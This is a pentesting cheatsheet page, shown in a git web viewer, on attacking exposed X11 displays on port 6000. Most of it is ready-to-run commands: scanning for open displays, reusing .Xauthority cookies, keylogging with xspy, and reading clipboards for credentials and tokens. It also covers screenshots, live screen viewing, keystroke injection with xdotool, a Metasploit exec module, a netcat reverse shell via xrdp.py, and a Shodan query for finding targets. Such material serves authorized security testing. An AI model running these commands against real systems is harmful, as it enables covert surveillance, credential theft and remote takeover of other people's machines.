daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

6000-pentesting-x11.md (8291B)


      1 ---
      2 title: "6000 - Pentesting X11"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/6000-pentesting-x11.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/6000-pentesting-x11.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 6000 - Pentesting X11
     14 
     15 ## Basic Information
     16 
     17 **X Window System** (X/X11) is a windowing system used on UNIX-like operating systems. If you can **connect to a display** and present a valid authorization token, you usually gain access to much more than graphics: **window enumeration, clipboard access, screenshots, input sniffing, and input injection** are common post-connection primitives.<sup>[[7]](#references)</sup>
     18 
     19 **Default port:** 6000
     20 
     21 ```text
     22 PORT       STATE   SERVICE
     23 6000/tcp   open    X11
     24 ```
     25 
     26 A display number usually maps to **TCP `6000 + <display>`** and to the local **Unix-domain socket** **`/tmp/.X11-unix/X<display>`**. Modern X servers may disable TCP listening, so an absent TCP port does not rule out a locally reachable display.<sup>[[6]](#references)</sup>
     27 
     28 ## Enumeration
     29 
     30 Check for **anonymous connection**:
     31 
     32 ```bash
     33 nmap -sV --script x11-access -p <PORT> <IP>
     34 msf> use auxiliary/scanner/x11/open_x11
     35 ```
     36 
     37 If a server is not listening on TCP, remember that a **local foothold** plus a valid **cookie** is still often enough to abuse the **Unix-domain socket**.
     38 
     39 #### Local Enumeration
     40 
     41 The file **`.Xauthority`** in the user's home directory is used by X11 clients to locate authorization records.<sup>[[1]](#references)</sup><sup>[[3]](#references)</sup> The following example illustrates its binary `MIT-MAGIC-COOKIE-1` record:
     42 
     43 ```bash
     44 $ xxd ~/.Xauthority
     45 00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d  ............0..M
     46 00000010: 4954 2d4d 4147 4943 2d43 4f4f 4b49 452d  IT-MAGIC-COOKIE-
     47 00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58  1...R.~..A.....X
     48 00000030: 041d ef                                  ...
     49 ```
     50 
     51 > MIT-magic-cookie-1: Generating 128bit of key (“cookie”), storing it in \~/.Xauthority (or where XAUTHORITY envvar points to). The client sends it to server plain! the server checks whether it has a copy of this “cookie” and if so, the connection is permitted. the key is generated by DMX.
     52 
     53 > [!WARNING]
     54 > In order to **use the cookie** you should set the env var: **`export XAUTHORITY=/path/to/.Xauthority`**
     55 
     56 Useful local triage:
     57 
     58 ```bash
     59 echo "$DISPLAY"
     60 ls -lah /tmp/.X11-unix/
     61 ps -efww | grep -E '[X]org|[X]wayland'
     62 xauth info
     63 xauth list
     64 ```
     65 
     66 If you already have code execution as another user, check the environment of GUI-related processes for **`DISPLAY`** and **`XAUTHORITY`**. If you need a refresher on `DISPLAY`, see [Linux environment variables](/hacktricks/linux-hardening/linux-basics/linux-environment-variables).
     67 
     68 The X server process may also expose the **authoritative authorization file** through the `-auth` argument, so it is worth checking the full command line of `Xorg`/`Xwayland`.<sup>[[6]](#references)</sup>
     69 
     70 #### Local Enumeration Session
     71 
     72 ```bash
     73 $ w
     74  23:50:48 up 1 day, 10:32,  1 user,  load average: 0.29, 6.48, 7.12
     75 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
     76 user     tty7     :0               13Oct23 76days 13:37   2.20s xfce4-session
     77 ```
     78 
     79 In the example, `localhost:0` was running `xfce4-session`.
     80 
     81 ## Verify Connection
     82 
     83 ```bash
     84 xdpyinfo -display <IP>:<display>
     85 xwininfo -root -tree -display <IP>:<display> # Ex: xwininfo -root -tree -display 10.5.5.12:0
     86 ```
     87 
     88 Useful follow-up enumeration once connected:
     89 
     90 ```bash
     91 xlsclients -display <IP>:<display>
     92 xprop -root _NET_ACTIVE_WINDOW -display <IP>:<display>
     93 xinput --list --display <IP>:<display>
     94 ```
     95 
     96 ## Keylogging
     97 
     98 [xspy] can monitor keystrokes sent through an accessible X11 display.<sup>[[8]](#references)</sup>
     99 
    100 Sample output:
    101 
    102 ```text
    103 xspy 10.9.xx.xx
    104 
    105 opened 10.9.xx.xx:0 for snoopng
    106 swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
    107 qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
    108 ```
    109 
    110 You can also inspect input devices and monitor events with the X Input extension:
    111 
    112 ```bash
    113 xinput --list --display <IP>:<display>
    114 xinput --test_xi2 --display <IP>:<display>
    115 ```
    116 
    117 ## Clipboard Access
    118 
    119 Once authenticated, reading the clipboard is usually trivial:
    120 
    121 ```bash
    122 xclip -display <IP>:<display> -selection clipboard -o
    123 xclip -display <IP>:<display> -selection primary -o
    124 xsel --display <IP>:<display> --clipboard --output
    125 ```
    126 
    127 This is useful for **credentials**, **API tokens**, copied **SSH keys**, password-manager pastes, and other short-lived secrets.
    128 
    129 ## Screenshot Capturing
    130 
    131 ```bash
    132 xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
    133 convert screenshot.xwd screenshot.png
    134 ```
    135 
    136 ## Remote Desktop View
    137 
    138 The following `xrdp.py` workflow comes from the unauthenticated-X11 walkthrough in reference 4.<sup>[[4]](#references)</sup>
    139 
    140 ```bash
    141 ./xrdp.py <IP:0>
    142 ```
    143 
    144 The following `xwininfo`/`xwatchwin` workflow comes from reference 5.<sup>[[5]](#references)</sup>
    145 
    146 First we need to find the ID of the window using `xwininfo`:
    147 
    148 ```text
    149 xwininfo -root -display 10.9.xx.xx:0
    150 
    151 xwininfo: Window id: 0x45 (the root window) (has no name)
    152 
    153 Absolute upper-left X:  0
    154 Absolute upper-left Y:  0
    155 Relative upper-left X:  0
    156 Relative upper-left Y:  0
    157 Width: 1024
    158 Height: 768
    159 Depth: 16
    160 Visual: 0x21
    161 Visual Class: TrueColor
    162 Border width: 0
    163 Class: InputOutput
    164 Colormap: 0x20 (installed)
    165 Bit Gravity State: ForgetGravity
    166 Window Gravity State: NorthWestGravity
    167 Backing Store State: NotUseful
    168 Save Under State: no
    169 Map State: IsViewable
    170 Override Redirect State: no
    171 Corners:  +0+0  -0+0  -0-0  +0-0
    172 -geometry 1024x768+0+0
    173 ```
    174 
    175 **XWatchwin**
    176 
    177 For **live viewing** use:
    178 
    179 ```bash
    180 ./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } # -w windowID is the one found with xwininfo
    181 ./xwatchwin 10.9.xx.xx:0 -w 0x45
    182 ```
    183 
    184 A more maintained alternative for shadowing an existing X11 display is `xpra`:<sup>[[2]](#references)</sup>
    185 
    186 ```bash
    187 xpra shadow :0
    188 xpra attach ssh:<user>@<host>:0
    189 ```
    190 
    191 ## Input Injection / UI Abuse
    192 
    193 Authenticated X11 access is not limited to observation. You can usually **activate windows**, **type**, and **send key presses**:
    194 
    195 ```bash
    196 WID=$(xdotool search --onlyvisible --name '.*' | head -n 1)
    197 xdotool windowactivate --sync "$WID"
    198 xdotool type --delay 50 'touch /tmp/.x11-pwned'
    199 xdotool key Return
    200 ```
    201 
    202 If you target a specific window with `xdotool type --window ...`, many applications will ignore the event because it is delivered with `XSendEvent`. Activating the target window first and then using normal keyboard injection is often more reliable.
    203 
    204 ## Get Shell
    205 
    206 ```text
    207 msf> use exploit/unix/x11/x11_keyboard_exec
    208 ```
    209 
    210 Another approach:
    211 
    212 **Reverse Shell:** `xrdp` also allows taking a reverse shell via Netcat.<sup>[[4]](#references)</sup> Type the following command:
    213 
    214 ```bash
    215 ./xrdp.py <IP:0> --no-disp
    216 ```
    217 
    218 In the interface you can see the **R-shell** option.
    219 
    220 Then, start a **Netcat listener** in your local system on port `5555`.
    221 
    222 ```bash
    223 nc -lvp 5555
    224 ```
    225 
    226 Then, put your IP address and port in the **R-Shell** option and click on **R-shell** to get a shell.
    227 
    228 ## Shodan
    229 
    230 - `port:6000 x11`
    231 
    232 ## References
    233 
    234 - [1] [X.Org `xauth` manual](https://www.x.org/releases/X11R7.7/doc/man/man1/xauth.1.xhtml)
    235 - [2] [Xpra manual](https://xpra.org/manual)
    236 - [3] [How X11 authorization works (.Xauthority / MIT-MAGIC-COOKIE) - Stack Overflow](https://stackoverflow.com/a/37367518)
    237 - [4] [Exploiting X11 Unauthenticated Access - Infosec Institute (archived)](https://web.archive.org/web/20250604035102id_/https://www.infosecinstitute.com/resources/hacking/exploiting-x11-unauthenticated-access/)
    238 - [5] [Vulnerability Analysis (LFF-IPS Part 2) - bitvijays (archived)](https://web.archive.org/web/20240000000000id_/https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
    239 - [6] [X.Org Xserver manual](https://www.x.org/releases/current/doc/man/man1/Xserver.1.xhtml)
    240 - [7] [X.Org Xsecurity manual](https://www.x.org/releases/current/doc/man/man7/Xsecurity.7.xhtml)
    241 - [8] [Kali Linux Tools: xspy](https://www.kali.org/tools/xspy/)